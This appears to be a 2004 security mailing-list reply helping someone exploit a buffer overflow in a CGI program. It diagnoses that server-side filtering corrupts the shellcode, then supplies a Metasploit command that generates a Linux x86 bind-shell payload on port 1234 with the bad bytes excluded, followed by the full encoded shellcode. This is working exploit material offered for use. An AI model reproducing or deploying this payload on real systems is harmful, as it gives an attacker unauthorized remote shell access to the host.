Re: Problem exploiting a CGI overflow

[Vlad902 <vlad902 () gmail com>]

On Wed, 24 Nov 2004 14:55:12 +0000, Víctor Henríquez
<vhenriquez () grancanaria com> wrote:
> > In short, looking at the gdb output- it looks like you are on the right
> > path and that there is possibly a problem with your shellcode.
>
> You are correct. There is a problem with the shellcode, but a rare problem. The
> shellcode is OK (it's aleph1 shellcode, smashing the stack), but when it is
> copied to the buffer, characters 0xb and 0xc are change for 0x20. Why?

Probably because of server-side filters.

> I wrote a nasty shellcode without 0xb,0xc and now I have another problem. The
> program call execve() but dont give me a shell... my new shellcode havent
> exit(0). Is this a problem?

The exit() is only reached if execve() fails.

> Now I investigate this, but ideas are welcome...
>
> I appreciate your help.

I'd just use the metasploit framework to help you wit the shellcode
generation, ie:

$ ./msfpayload linx86_bind LPORT=1234 R | ./msfencode -b "\x00\x0b\x0c" -t c
[*] Using Msf::Encoder::PexFnstenvMov with final size of 106 bytes
"\x6a\x15\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfe\x2d\x77"
"\x60\x83\xeb\xfc\xe2\xf4\xcf\xf6\x24\x23\xad\x47\x75\xe9\x1f\x47"
"\x11\x38\x67\xe0\xf7\xf6\xa5\x75\x11\x08\xfa\xff\x11\x33\x77\xcc"
"\xc7\x06\xae\x7c\x21\xe9\x1f\xe0\xf7\xd0\x98\xfc\x94\xad\x7e\x7f"
"\x25\x36\xbd\xa4\x96\xd0\x98\xe0\xf7\xf3\x94\x2f\x2e\xd0\xc1\xe0"
"\xf7\x29\x87\xd4\x25\x08\xd1\x02\x04\x08\x96\x02\x15\x09\x90\xa4"
"\x94\x32\xad\xa4\x96\xd0\xf5\xe0\xf7\x60";

There are no plain execve() payloads but this should serve fine.

> --
> Víctor Henríquez

-vlad902